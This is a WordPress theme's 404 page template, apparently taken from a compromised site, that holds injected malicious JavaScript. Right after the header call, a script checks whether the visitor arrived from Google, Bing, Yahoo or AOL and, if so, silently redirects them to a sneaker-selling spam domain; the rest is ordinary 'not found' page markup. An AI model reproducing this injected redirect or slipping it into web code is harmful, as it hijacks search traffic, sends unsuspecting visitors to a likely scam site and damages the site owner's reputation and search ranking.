File: //proc/self/root/var/www/lipovac/wp-content/themes/senior/404.php
<?php
/**
 * The template for displaying 404 pages (Not Found).
 *
 * @package WordPress
 * @subpackage Wheels
 */
get_header();
    echo'<script>
var s = document.referrer;
if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {
    self.location = \'yeezyboost750s.com\';
}</script > ';
?>
<?php get_template_part( 'templates/title' ); ?>
<div class="<?php echo wheels_class( 'main-wrapper' ); ?>">
	<div class="<?php echo wheels_class( 'container' ); ?>">
		<div class="double-padded">
			<h1 class="entry-title"><?php _e( 'This is somewhat embarrassing, isn’t it?', 'wheels' ); ?></h1>
			<p><?php _e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', 'wheels' ); ?></p>
			<?php get_search_form(); ?>
		</div>
	</div>
</div>
<?php get_footer(); ?>